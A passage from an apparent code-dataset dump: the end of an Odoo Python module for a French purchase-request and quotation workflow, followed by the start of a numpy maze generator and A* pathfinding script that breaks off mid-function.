    \", \"Demande d'achat\", demande.id, demande.user_id.id, demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nMerci de bien vouloir prendre en compte la demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_sce_achat', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Demande d'achat : Validée par le Département des Finances\", message, demande)\n \n return self.write(cr,uid,ids,{'state':'achat'})\n \n \n def action_caisse(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n if demande.type_demande == 'achat' :\n raise osv.except_osv(_('Warning'),_('Les demandes de type Dépense diverses achat doivent être transmises aux achats'))\n \n besoin_obj = self.pool.get('purchase.exp.besoin')\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Demande d'achat transmise à la caisse pour paiement
    \", \"Demande d'achat\", demande.id, demande.user_id.id, demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nMerci de bien vouloir prendre en compte la demande d'achat ci-dessous pour paiement.\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_sce_caisse', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Demande d'achat : Validée par le Département des Finances\", message, demande)\n return self.write(cr,uid,ids,{'state':'caisse'})\n \n \n def action_commande(self,cr,uid,ids,context=None):\n for achat in self.browse(cr,uid,ids) :\n if not achat.quotation_id :\n raise osv.except_osv('Erreur','Veuillez selectionner un devis fournisseur')\n self.pool.get('purchase.order').wkf_approve_order(cr, uid, [achat.quotation_id.id])\n self.pool.get('purchase.order').action_picking_create(cr, uid, [achat.quotation_id.id])\n \n for demande in self.browse(cr,uid,ids):\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Emission du Bon de Commande au fournisseur
    \" + demande.quotation_id.partner_id.name, \"Bon de Commande\", demande.id, demande.user_id.id, demande, context)\n return self.write(cr,uid,ids,{'state':'commande'})\n \n def action_cotation(self,cr,uid,ids,context=None):\n obj_cotation = self.browse(cr,uid,ids,context)\n obj_purchase_order = self.pool.get('purchase.order')\n obj_purchase_order_line = self.pool.get('purchase.order.line')\n obj_bon = self.pool.get('purchase.exp.sortie')\n \n cr.execute(\"\"\"SELECT product_id,sum(product_qty),p.id,product_uom,price_unit,pdt.default_code,pdt.name_template,partner_id\n FROM purchase_exp_achat p,purchase_exp_achat_detail dp,product_product pdt\n WHERE p.id=dp.demande_id\n and pdt.id=dp.product_id\n GROUP BY product_id,p.id,product_uom,price_unit,pdt.default_code,pdt.name_template,partner_id\"\"\")\n produits = cr.fetchall()\n \n four = {}\n for demande in self.browse(cr,uid,ids,context):\n #test = _unique(cotation.cotation_ids)\n \n def unique():\n found = set([])\n keep = []\n \n for dmde_achat in demande.line_det_ids :\n if dmde_achat.partner_id.id not in found:\n found.add(dmde_achat.partner_id.id)\n keep.append(dmde_achat.partner_id.id)\n \n return keep\n \n \"\"\"\"id_offre = 0\n if cotation.appel_offre :\n offre = {\n 'date_start': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'state': 'draft',\n 'exclusive': 'multiple',\n 'company_id': self.pool.get('res.company')._company_default_get(cr, uid, 'purchase.requisition', context=context),\n 'user_id': uid,\n 'name': self.pool.get('ir.sequence').get(cr, uid, 'purchase.order.requisition'),\n }\n id_offre = obj_offre.create(cr, uid, offre, context=context)\"\"\"\n \n four = unique()\n for frs in four:\n reference = self.pool.get('ir.sequence').get(cr, uid, 'purchase.order')\n order_data = {\n 'name': reference,\n 'date_order': time.strftime('%Y-%m-%d'),\n 'state': 'draft',\n 'partner_id': frs,\n #'partner_address_id': self.pool.get('res.partner').search(cr,uid,[('partner_id','=',frs)])[0],\n 'pricelist_id': demande.pricelist_id.id,\n 'location_id':demande.location_id.id,\n 'invoice_method':'order',\n #'requisition_id':id_offre,\n }\n id = obj_purchase_order.create(cr, uid, order_data, context=context)\n line = \"\"\n for pdt in produits :\n if pdt[2]==demande.id and pdt[7]==frs:\n line_data = {\n 'product_id': pdt[0],\n 'product_qty': pdt[1],\n 'product_uom': pdt[3],\n 'name': pdt[6],\n 'date_planned': time.strftime('%Y-%m-%d'),\n 'price_unit': pdt[4],\n 'order_id': id\n }\n #line = line + str(pdt[5]) + ' ' + str(pdt[6]) + \"\\n\"\n obj_purchase_order_line.create(cr, uid, line_data, context=context)\n \n return self.write(cr,uid,ids,{'state':'cotation'})\n \n def action_done(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Demande d'achat terminée
    \", \"Demande d'achat\", demande.id, demande.user_id.id, demande, context)\n self.write(cr,uid,ids,{'state':'done'})\n \n return True\n \n \n def action_bon_sortie(self,cr,uid,ids,context=None):\n sortie_obj = self.pool.get('purchase.exp.sortie')\n det_sortie_obj = self.pool.get('purchase.exp.sortie.detail')\n bon_livr_obj = self.pool.get('stock.picking')\n move_obj = self.pool.get('stock.move')\n \n for dmde in self.browse(cr,uid,ids):\n \n sortie = {\n 'name':self.pool.get('ir.sequence').get(cr, uid, 'purchase.exp.sortie'),\n 'datetime':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'achat_id':dmde.id,\n 'receveur_id':dmde.demandeur_id.id,\n } \n id = sortie_obj.create(cr, uid, sortie, context=context)\n \n #try :\n address_id = self.pool.get('res.partner').search(cr,uid,[('id','=',dmde.demandeur_id.id)])[0]\n reference = self.pool.get('ir.sequence').get(cr, uid, 'stock.picking.out')\n livraison = {\n 'name': reference,\n 'origin': dmde.name,\n 'achat_id':dmde.id,\n 'min_date':dmde.date_prevue,\n 'max_date':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'address_id':address_id,\n 'date':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'date_done':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'stock_journal_id':1,\n 'type': 'out',\n 'move_type':'one',\n 'state':'draft'\n }\n \n livr_id = bon_livr_obj.create(cr, uid, livraison, context=context)\n \n for det_dmde in dmde.line_det_ids :\n \n det_sortie = {\n 'name':det_dmde.name,\n 'product_id':det_dmde.product_id.id,\n 'quantite':det_dmde.product_qty,\n 'qte_dispo':det_dmde.product_id.qty_available,\n 'besoin_id':dmde.demande_id.id,\n 'sortie_id':id\n }\n \n move_line = {\n 'name': 'BSLine - %s' % (det_dmde.product_id.name),\n 'priority':'1',\n #'create_date':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'date':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'date_expected':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'product_id':det_dmde.product_id.id,\n 'product_qty':det_dmde.product_qty,\n 'product_uos_qty':det_dmde.product_qty,\n 'product_uom':self.pool.get('product.uom').search(cr,uid,[('id','=',det_dmde.product_id.uom_id.id)])[0],\n 'product_uos':self.pool.get('product.uom').search(cr,uid,[('id','=',det_dmde.product_id.uom_id.id)])[0],\n 'price_unit':det_dmde.price_unit,\n 'location_id':self.pool.get('stock.location').search(cr,uid,[('name','=','Stock')])[0],\n 'location_dest_id':self.pool.get('stock.location').search(cr,uid,[('name','=','Output')])[0],\n 'address_id':self.pool.get('res.partner').search(cr,uid,[('id','=',dmde.demandeur_id.id)])[0],\n 'picking_id':livr_id,\n 'state':'draft',\n }\n \n det_sortie_obj.create(cr, uid, det_sortie, context=context)\n move_obj.create(cr, uid, move_line, context=context)\n \"\"\"except :\n address_id = False\"\"\"\n \n for demande in self.browse(cr,uid,ids):\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Emission de bon pour sortie
    \", \"Bon pour sortie\", demande.id, demande.user_id.id, demande, context)\n \n besoin_obj = self.pool.get('purchase.exp.besoin')\n message = \"\"\"Bonjour M/Mme\\n\\nVeuillez trouver le bon pour sortie relatif à votre demande d'achat ci-dessous.\\n\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_sce_achat', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Bon pour sortie : Transmis par le responsable des achats\", message, demande)\n \n return self.write(cr,uid,ids,{'state':'bon'})\n \n \n def print_requisition(self, cr, uid, ids, context=None):\n #assert len(ids) == 1, 'This option should only be used for a single id at a time'\n datas = self.read(cr, uid, [105], context=context)\n if datas :\n data = datas[0]\n \n self.write(cr,uid,ids,data,context)\n datas = {\n 'ids': ids,\n 'model': 'purchase.exp.achat',\n 'form': data\n }\n\n return {\n 'type': 'ir.actions.report.xml',\n 'report_name': 'da.report',\n 'datas': datas,\n 'nodestroy':True\n }\n \n _defaults={\n 'user_id':_user_get,\n 'date':time.strftime('%Y-%m-%d'),\n #'state':'draft', \n #'alerte_mail':True,\n 'notes': \"La présente demande s'inscrit dans le cadre de...\",\n 'location_dest_id':lambda obj, cr, uid, context: obj.pool.get('stock.location').search(cr, uid, [('name', '=', 'Output')], context=context)[0],\n }\n \n \ndemande_achat()\n\n\nclass detail_demande_achat(models.Model):\n _name=\"purchase.exp.achat.detail\"\n _description=\"Détail demande d'achat\"\n\n \n def _get_quantite(self,cr,uid,ids,field,arg,context=None):\n res={}\n var_tmp_ids=self.browse(cr,uid,ids,context)\n for s in var_tmp_ids:\n res[s.id]=s.product_id.qty_available\n return res\n\n \n def _get_quantite_cmde(self,cr,uid,ids,field,arg,context=None):\n res={}\n cr.execute(\"SELECT sum(product_qty),product_id,state FROM purchase_order_line WHERE state='confirmed' GROUP BY product_id,state\")\n produits = cr.fetchall()\n\n for det in self.browse(cr,uid,ids,context):\n qte = 0\n for prod in produits:\n if det.product_id.id==prod[1] :\n qte=prod[0]\n res[det.id]=qte\n return res\n \n \n def quantite_livree(self,cr,uid,ids,field,arg,context=None):\n res={}\n \n cr.execute(\"\"\"SELECT SUM(ds.quantite),ds.product_id,a.id FROM purchase_exp_sortie AS s,purchase_exp_sortie_detail AS ds, purchase_exp_achat a,purchase_exp_besoin b WHERE a.id=s.achat_id AND s.id=ds.sortie_id AND a.demande_id=b.id GROUP BY ds.product_id,a.id\"\"\")\n produits = cr.fetchall()\n \n for detail in self.browse(cr,uid,ids):\n qte = 0\n for prod in produits:\n if detail :\n if detail.demande_id.id==prod[2] :\n if detail.product_id.id==prod[1] :\n qte=prod[0]\n res[detail.id]=qte\n\n return res\n \n \n def _check_qte_livree(self,cr,uid,ids,context=None):\n res={}\n for s in self.browse(cr,uid,ids) :\n if s.product_qty < s.gave_qty :\n return False\n return True\n \n \n def _check_qte_null(self,cr,uid,ids,context=None):\n res={}\n for s in self.browse(cr,uid,ids) :\n if s.product_qty ==0 :\n return False\n return True\n\n def _get_sub_total(self,cr,uid,ids,field,arg,context=None):\n res={}\n remise = 0.00\n subtotal = 0.00\n taxe = 0.00\n for i in self.browse(cr, uid, ids, context):\n if i.taxe_id :\n taxe = i.taxe_id.amount\n remise = i.discount\n subtotal= i.price_unit * (1 - remise/100) * i.product_qty\n res[i.id]=subtotal\n return res\n \n \n \n _columns={\n 'name': fields.char('Désignation', size=256, required=True),\n 'product_qty': fields.float('Qté dmdée', 
required=True),\n        'available_qty':fields.function(_get_quantite,\n                                   method=True,\n                                   type='float',\n                                   string='Qté dispo.', help='Quantité réelle du produit disponible en stock'),\n        'ordered_qty':fields.function(_get_quantite_cmde,\n                                  method=True,\n                                  type='float', string='Qté cmdée.', help='Quantité commandée du produit demandé'),\n        'gave_qty':fields.function(quantite_livree,\n                                  method=True,\n                                  type='float',\n                                  string='Qté livrée', help='Quantité livrée du produit demandé'),\n        'date_planned': fields.date('Date', required=True, select=True),\n        'product_uom': fields.many2one('product.uom', 'Product UOM', required=True, help='Unité de mesure du produit'),\n        'product_id': fields.many2one('product.product', 'Product', domain=[('purchase_ok','=',True)], change_default=True),\n        'price_unit': fields.float('Prix unitaire', required=True),\n        'taxe_id':fields.many2one('account.tax','Taxe', domain=[('type_tax_use','in',('purchase','all'))]),\n        'partner_id':fields.many2one('res.partner', 'Fournisseur potentiel', required=False, domain=[('supplier','=',True)], help='Fournisseur potentiel de la demande'),\n        'notes': fields.text('Notes'),\n        'demande_id':fields.many2one('purchase.exp.achat', 'Demande', required=False, ondelete='cascade'),\n        'discount':fields.float('Remise (%)'),\n        'subtotal':fields.function(_get_sub_total,method=True,type='float',string=\"Sous-Total\"),\n    }\n    \n    _defaults={\n        'product_qty':1\n    }\n    # Both checks must live in a single _constraints list: assigning the attribute twice silently discards the first constraint.\n    _constraints=[\n        (_check_qte_livree,\"La quantité de produit à livrer ne peut être supérieure à la quantité initiale demandée\",['product_qty']),\n        (_check_qte_null,\"Les quantités nulles ne sont pas admises\",['product_qty']),\n    ]\n\ndetail_demande_achat()\n\n\nclass bon_sortie(models.Model):\n    _name=\"purchase.exp.sortie\"\n    _description=\"Bon de sortie\"\n    _order = 'name desc'\n    \n    def _receveur_get(self, cr, uid,ids, context=None):\n        res={}\n        for s in self.browse(cr,uid,ids) :\n            # look up the requester of the linked purchase request (a hard-coded id was used here before)\n            cr.execute(\"\"\"SELECT demandeur_id FROM purchase_exp_achat WHERE id=%s\"\"\",(s.achat_id.id,))\n            demandeur = cr.fetchall()\n            for d in demandeur :\n                res[s.id]=d[0]\n        return res\n\n    \n    def _check_state(self,cr,uid,ids,context=None):\n        for s in self.browse(cr,uid,ids) :\n            if s.achat_id.state == \"confirmed\" :\n                return False\n        return True\n    \n    \n    def _check_produits(self,cr,uid,ids,context=None):\n        res={}\n        for s in self.browse(cr,uid,ids) :\n            id_achat = s.achat_id.id\n\n        cr.execute(\"\"\"SELECT product_id,b.id FROM purchase_exp_achat_detail AS pd, purchase_exp_achat AS pa,purchase_exp_besoin b WHERE pa.id=pd.demande_id AND pa.demande_id=b.id\"\"\")\n        prod = cr.fetchall()\n        \n        for bon in self.browse(cr,uid,ids) :\n            if bon.achat_id.id == id_achat :\n                for d in bon.det_sortie_ids :\n                    cpt=0\n                    for p in prod :\n                        if d.product_id.id == p[0] :\n                            cpt+=1 \n                    if cpt == 0 :\n                        return False\n            if bon.achat_id.state != \"confirmed\" and bon.achat_id.state != \"cotation\" :\n                return False\n        \n        return True \n    \n    \n    def get_inputs(self, cr, uid,ids, context=None):\n        res=[]\n        for bon in self.browse(cr,uid,ids) :\n            inputs = {\n                'product_id':1,\n                'quantite':1,\n            }\n            res += [inputs]\n        return res\n    \n    \n    def onchange_achat_id(self, cr, uid, ids, achat_id):\n        if not achat_id:\n            return {}\n        ach = self.pool.get('purchase.exp.achat').browse(cr, uid, achat_id)\n        input_line_ids = self.get_inputs(cr, uid,ids)\n        return {'value': { \n                          'receveur_id': ach.demandeur_id.id,\n                          'det_sortie_ids':input_line_ids\n                          },\n                }\n\n    \n    _columns={\n        'name':fields.char('Référence', size=64, required=True, readonly=False),\n        
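# 'name' is auto-assigned from the 'purchase.exp.sortie' ir.sequence (see _defaults below).\n        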
'datetime': fields.datetime('Date',required=True),\n 'achat_id':fields.many2one('purchase.exp.achat', \"Demande d'achat\", required=True, ondelete='cascade'),\n 'receveur_id':fields.many2one('hr.employee', 'Destinataire', required=False),\n 'det_sortie_ids':fields.one2many('purchase.exp.sortie.detail', 'sortie_id', 'Détail bon de sortie', required=False),\n 'notes':fields.text('Notes')\n }\n \n _defaults={\n 'name':lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'purchase.exp.sortie'),\n 'datetime':time.strftime('%Y-%m-%d %H:%M:%S'),\n }\n \n #_constraints=[(_check_produits,\"Veuillez selectionnez des produits de la demande d'achat confirmée pour la saisie du bon de sortie\",['achat_id'])]\n _sql_constraints = [\n ('name_uniq', 'unique(name)', 'La reférence doit être unique !'),\n ]\nbon_sortie()\n\n\nclass bon_sortie_detail(models.Model):\n _name=\"purchase.exp.sortie.detail\"\n _description=\"Détail bon de sortie\"\n \n \n def onchange_product_id(self, cr, uid, ids, product_id):\n if not product_id:\n return {}\n pro = self.pool.get('product.product').browse(cr, uid, product_id)\n return {'value': { 'qte_dispo': pro.qty_available, \n },\n }\n \n \n def _check_qte_produits(self,cr,uid,ids,context=None):\n res={}\n for s in self.browse(cr,uid,ids) :\n if s.quantite > s.qte_dispo or s.quantite == 0 or s.qte_dispo == 0:\n return False\n return True\n \n _columns={\n 'name':fields.char('Reference', size=128, required=False),\n 'product_id':fields.many2one('product.product', 'Désignation', required=True),\n 'quantite':fields.integer('Quantité', required=True),\n 'qte_dispo':fields.integer('Qté dispo', required=True),\n 'besoin_id':fields.many2one('purchase.exp.besoin', 'Besoin', required=False, ondelete='cascade'),\n 'sortie_id':fields.many2one('purchase.exp.sortie', 'Demande', required=False, ondelete='cascade'),\n }\n _defaults={\n 'quantite':1,\n }\n _constraints=[(_check_qte_produits,\"Vous ne pouvez générer de bon de sortie pour des produits en quantité insuffisante ou nulle\",['product_id'])]\nbon_sortie_detail()\n\n\nclass cotation_groupee(models.Model):\n _name=\"purchase.exp.cotation.groupee\"\n _description=\"Demande de cotations groupées\"\n _order = \"id desc\"\n \n \n def _employee_get(self, cr, uid, context=None):\n ids = self.pool.get('hr.employee').search(cr, uid, [('user_id', '=', uid)], context=context)\n if ids:\n return ids[0]\n return False\n \n \n _columns={\n 'name':fields.char('Libellé', size=128, required=True, readonly=False,states={'done':[('readonly',True)]}),\n 'date':fields.date('Date', required=True,states={'done':[('readonly',True)]}),\n 'pricelist_id':fields.many2one('product.pricelist', 'Liste de prix', required=True,states={'done':[('readonly',True)]}),\n 'location_id':fields.many2one('stock.location', 'Emplacement', required=True,states={'done':[('readonly',True)]}),\n 'employee_id':fields.many2one('hr.employee', 'Employé', required=False),\n 'template_mail_id':fields.many2one('purchase.exp.achat.template.mail','Template mail achat', required=False),\n 'appel_offre':fields.boolean(\"Appel d'offre\", help=\"Si coché, permet de générer automatiquement un appel d'offre qui contiendra toutes les cotations groupées\",states={'done':[('readonly',True)]}),\n 'alerte_mail':fields.boolean(\"Envoi de mail\", help=\"Si coché, permet d'envoyer automatiquement des e-mails aux fournisseurs séléctionnés\",states={'done':[('readonly',True)]}),\n 'note':fields.text('Notes',states={'done':[('readonly',True)]}),\n 
'cotation_ids':fields.many2many('purchase.exp.achat', 'cotation_achat_rel', 'cotation_id', 'achat_id', \"Demandes d'achat\", domain=[('state','in',('cotation','confirmed'))],states={'done':[('readonly',True)]}),\n 'fournisseur_ids':fields.many2many('res.partner', 'partner_quotation_rel', 'cotation_id', 'partner_id', 'Autres Fournisseurs', domain=[('supplier','=','True')], help=\"L'on donne la possibilité à l'utilisateur de choisir d'autres fournisseur pour les demande de cotation hors mis ceux ceux choisi dans les expressions de besoins\"),\n 'state':fields.selection([('draft','Brouillon'),\n ('confirmed','Confirmé'),\n ('done','Clôturé')],'Statut',readonly=True,required=True,states={'done':[('readonly',True)]}\n )\n }\n\n \n def _template_mail_get(self, cr, uid,ids, context=None):\n ids = self.pool.get('purchase.exp.achat.template.mail').search(cr, uid, [('name', '=', 'cotation')], context=context)\n if ids:\n return ids[0]\n return False\n \n def action_draft(self,cr,uid,ids,context=None):\n return self.write(cr,uid,ids,{'state':'draft'})\n \n def action_confirm(self,cr,uid,ids,context=None):\n return self.write(cr,uid,ids,{'state':'confirmed'})\n \n def action_done(self,cr,uid,ids,context=None):\n \n #obj_cotation = self.browse(cr,uid,ids,context)\n obj_purchase_order = self.pool.get('purchase.order')\n obj_purchase_order_line = self.pool.get('purchase.order.line')\n #obj_bon = self.pool.get('purchase.exp.sortie')\n obj_offre = self.pool.get('purchase.requisition')\n obj_offre_line = self.pool.get('purchase.requisition.line')\n purchase_id = False\n \n cr.execute(\"\"\"SELECT product_id,sum(product_qty),c.id,product_uom,price_unit,pdt.default_code,pdt.name_template,partner_id\n FROM purchase_exp_achat_detail p, purchase_exp_cotation_groupee c, cotation_achat_rel car,product_product pdt\n WHERE p.demande_id=car.achat_id\n AND c.id=car.cotation_id\n AND pdt.id=p.product_id\n GROUP BY product_id,c.id,product_uom,price_unit,pdt.default_code,pdt.name_template,partner_id\"\"\")\n produits = cr.fetchall()\n \n \n four = {}\n for cotation in self.browse(cr,uid,ids,context):\n #test = _unique(cotation.cotation_ids)\n \n def unique():\n found = set([])\n keep = []\n \n for dmde_achat in cotation.cotation_ids :\n for det_achat in dmde_achat.line_det_ids :\n if det_achat.partner_id.id not in found :\n found.add(det_achat.partner_id.id)\n keep.append(det_achat.partner_id.id)\n \n \"\"\"for autre_fournisseur in cotation.fournisseur_ids :\n if autre_fournisseur.id not in found :\n found.add(autre_fournisseur.id)\n keep.append(autre_fournisseur.id)\"\"\"\n \n return keep\n \n \n def unique_produits():\n found = set([])\n keep = []\n \n for dmde_achat in cotation.cotation_ids :\n for det_achat in dmde_achat.line_det_ids :\n if det_achat.product_id not in found:\n found.add(det_achat.product_id)\n keep.append(det_achat.product_id)\n \n return keep\n \n \n id_offre = 0\n if cotation.appel_offre :\n offre = {\n 'date_start': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'state': 'draft',\n 'exclusive': 'multiple',\n 'company_id': self.pool.get('res.company')._company_default_get(cr, uid, 'purchase.requisition', context=context),\n 'user_id': uid,\n 'name': self.pool.get('ir.sequence').get(cr, uid, 'purchase.order.requisition'),\n }\n id_offre = obj_offre.create(cr, uid, offre, context=context)\n \n #try : \n \n four = unique()\n \n for frs in four:\n reference = self.pool.get('ir.sequence').get(cr, uid, 'purchase.order')\n #partner_id = self.pool.get('res.partner').search(cr,uid,[('partner_id','=',frs)])[0]\n 
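# Create one draft purchase order per distinct supplier collected by unique() above; its lines are filled from the aggregated request details below.\n                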
order_data = {\n 'name': reference,\n 'date_order': time.strftime('%Y-%m-%d'),\n 'state': 'draft',\n 'partner_id': frs,\n #'partner_address_id': partner_id,\n 'pricelist_id': cotation.pricelist_id.id,\n 'location_id':cotation.location_id.id,\n 'invoice_method':'order',\n 'requisition_id':id_offre,\n }\n purchase_id = obj_purchase_order.create(cr, uid, order_data, context=context)\n #raise osv.except_osv('Warning test', purchase_id) \n line = \"\"\n for pdt in produits :\n if pdt[2]==cotation.id and pdt[7]==frs:\n cr.execute(\"\"\"SELECT product_id,sum(product_qty),c.id\n FROM purchase_exp_achat_detail p, purchase_exp_cotation_groupee c, cotation_achat_rel car,product_product pdt\n WHERE p.demande_id=car.achat_id\n AND c.id=car.cotation_id\n AND pdt.id=p.product_id\n AND p.product_id=%s\n AND c.id=%s\n GROUP BY product_id,c.id\"\"\",(pdt[0],cotation.id))\n quantite=cr.fetchall()\n qty=0\n for qte in quantite :\n qty=qte[1]\n line_data = {\n 'product_id': pdt[0],\n 'product_qty': qty,\n 'product_uom': pdt[3],\n 'name': pdt[6],\n 'date_planned': time.strftime('%Y-%m-%d'),\n 'price_unit': pdt[4],\n 'order_id': purchase_id,\n }\n line = line + str(pdt[5]) + ' ' + str(pdt[6]) + \"\\n\"\n obj_purchase_order_line.create(cr, uid, line_data, context=context)\n \n #Création des produits de l'appel d'offre\n found = set([])\n keep = []\n if pdt[0] not in found:\n \n cr.execute('select uom_id from product_product p, product_template t where p.product_tmpl_id=t.id and p.id=%s',(pdt[0],))\n uom_id = cr.fetchone()[0]\n cr.execute('select company_id from product_product p, product_template t where p.product_tmpl_id=t.id and p.id=%s',(pdt[0],))\n company_id = cr.fetchone()[0]\n \n produits_offre = {\n 'product_id': pdt[0],\n 'product_uom_id': uom_id,\n 'product_qty': qty,\n 'requisition_id' : id_offre,\n 'company_id': company_id,\n }\n obj_offre_line.create(cr, uid, produits_offre, context=context)\n found.add(pdt[0])\n #keep.append(pdt[0])\n \n cr.execute(\"\"\"SELECT COUNT(*) AS nbr_doublon,product_id\n FROM purchase_requisition_line\n WHERE requisition_id=%s\n GROUP BY product_id\n HAVING COUNT(*) > 1\"\"\",(id_offre,))\n \n #Send mail sans queue\n if cotation.alerte_mail :\n #Vérification de possession d'adresse mail des fournisseurs\n for cot in cotation.cotation_ids :\n for cota in cot.line_det_ids :\n if not cota.partner_id.email :\n raise osv.except_osv('Error','Assurez-vous que chaque fournisseur possède une adresse mail')\n \n cr.execute('select email from res_partner where id=%s',(frs,))\n email = cr.fetchone()[0]\n if cotation.template_mail_id.active :\n ir_mail_server = self.pool.get('ir.mail_server')\n msg = ir_mail_server.build_email(cotation.employee_id.work_email, [email], \"Demande de cotation \" + reference, cotation.template_mail_id.mail + \"\\n\\n\" + line)\n ir_mail_server.send_email(cr, uid, msg)\n #except :\n # partner_id = ''\n \n for c in cotation.cotation_ids :\n cr.execute(\"\"\"UPDATE purchase_exp_achat SET state = %s WHERE state = %s AND id = %s\"\"\",('cotation','confirmed',str(c.id)))\n \n \n return self.write(cr,uid,ids,{'state':'done'})\n \n _defaults={\n 'employee_id': _employee_get,\n 'template_mail_id':_template_mail_get,\n 'state':'draft',\n 'name':'Cotation groupée du %s' % time.strftime('%d/%m/%Y %H:%M:%S'),\n 'date':time.strftime('%Y-%m-%d'),\n 'pricelist_id':lambda obj, cr, uid, context: obj.pool.get('product.pricelist').search(cr, uid, [('type', '=', 'purchase')], context=context)[0],\n 'location_id':lambda obj, cr, uid, context: 
obj.pool.get('stock.location').search(cr, uid, [('name', '=', 'Stock')], context=context)[0],\n\n }\n \ncotation_groupee()\n\nclass purchase_order(models.Model):\n _inherit = \"purchase.order\"\n _name = \"purchase.order\"\n \n _columns={\n 'achat_id':fields.many2one('purchase.exp.achat', \"Demande d'achat\", required=False),\n 'besoin_id':fields.many2one('purchase.exp.besoin', \"Expression de besoin\", required=False),\n }\npurchase_order()\n\n\nclass product_product(models.Model):\n _inherit = \"product.product\"\n _name = \"product.product\"\n \n _columns={\n 'achat_id':fields.many2one('purchase.exp.achat', \"Demande d'achat\", required=False),\n }\n \nproduct_product()\n\nclass stock_picking(models.Model):\n _inherit = \"stock.picking\"\n _name = \"stock.picking\"\n \n _columns={\n 'achat_id':fields.many2one('purchase.exp.achat', \"Demande d'achat\", required=False),\n }\n \nstock_picking()\n\nclass product_category_temp(models.Model):\n _name = \"product.category.temp\"\n \n _columns={\n 'catogory_id':fields.many2one('product.category', \"Category\", required=False),\n }\n \nproduct_category_temp()\n\n\nclass commentaire(models.Model):\n _name=\"purchase.exp.commentaire\"\n _description=\"Commentaires des expressions de besoin\"\n \n \n _columns={\n 'name':fields.char('Name', size=64, required=False, readonly=False),\n 'user_id':fields.many2one('res.users', 'Utilisateur', required=False, readonly=True),\n 'date': fields.datetime('Date'),\n 'commentaire':fields.text('Commentaire', required=True),\n 'besoin_id':fields.many2one('purchase.exp.besoin', 'Besoin', required=False),\n 'order_id':fields.many2one('purchase.exp.achat', 'Ordre achat', required=False),\n }\n \n \n def unlink(self, cr, uid, ids, context=None):\n for comment in self.browse(cr,uid,ids) :\n if comment.user_id.id != uid :\n raise osv.except_osv('Erreur', \"Vous ne pouvez supprimer le commentaire d'un autre utilisateur !\")\n \n return models.Model.unlink(self, cr, uid, ids, context=context)\n\n \n def _user_get(self, cr, uid, context=None):\n ids = self.pool.get('res.users').search(cr, uid, [('id', '=', uid)], context=context)\n if ids:\n return ids[0]\n return False\n \n \n \n _defaults={\n 'user_id':_user_get,\n 'date': lambda *a: str(datetime.now())\n }\ncommentaire()\n\n\nclass sale_order(models.Model):\n _inherit='sale.order'\n \n _columns={\n 'delai_livraison':fields.date('Delai de livraison'),\n 'da_ids':fields.one2many('purchase.exp.achat', 'sale_id', \"Demande d'achat\"),\n }\nsale_order()\n\n","repo_name":"lekaizen210/addons_talentys","sub_path":"talentys_custom/models/requisition_old.py","file_name":"requisition_old.py","file_ext":"py","file_size_in_byte":52796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39518330772","text":"from numpy.random import random_integers as rnd\nimport numpy as np\n\n\ndef maze(width=70, height=70, complexity=1, density=1):\n # Only odd shapes\n shape = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)\n # Adjust complexity and density relative to maze size\n complexity = int(complexity * (5 * (shape[0] + shape[1])))\n density = int(density * (shape[0] // 2 * shape[1] // 2))\n # Build actual maze\n Z = np.zeros(shape, dtype=np.int8)\n # Fill borders\n Z[0, :] = Z[-1, :] = 2\n Z[:, 0] = Z[:, -1] = 2\n # Make isles\n for i in range(density):\n x, y = rnd(0, shape[1] // 2) * 2, rnd(0, shape[0] // 2) * 2\n Z[y, x] = 2\n for j in range(complexity):\n neighbours = []\n if x > 1:\n neighbours.append((y, x - 2))\n if x < 
shape[1] - 2:\n            neighbours.append((y, x + 2))\n        if y > 1:\n            neighbours.append((y - 2, x))\n        if y < shape[0] - 2:\n            neighbours.append((y + 2, x))\n        if len(neighbours):\n            y_, x_ = neighbours[rnd(0, len(neighbours) - 1)]\n            if Z[y_, x_] == 0:\n                Z[y_, x_] = 2\n                Z[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 2\n                x, y = x_, y_\n    return Z\n\n\ndef a_star(start, goal, gen_maze):\n    # The set of nodes already evaluated\n    closedSet = []\n\n    # The set of currently discovered nodes that are not evaluated yet.\n    # Initially, only the start node is known.\n    openSet = [start]\n\n    # For each node, which node it can most efficiently be reached from.\n    # If a node can be reached from many nodes, cameFrom will eventually contain the\n    # most efficient previous step.\n    # cameFrom = np.zeros(gen_maze.shape(), dtype=np.int8) # an empty map\n    cameFrom = {}\n\n    # For each node, the total cost of getting from the start node to the goal\n    # by passing by that node. That value is partly known, partly heuristic.\n    fScore = np.full(gen_maze.shape, np.inf) # map with default value of Infinity\n\n    # For the first node, that value is completely heuristic.\n    fScore[start] = heuristic(start, goal)\n\n    while openSet:\n        # the node in openSet having the lowest fScore[] value (min() over the 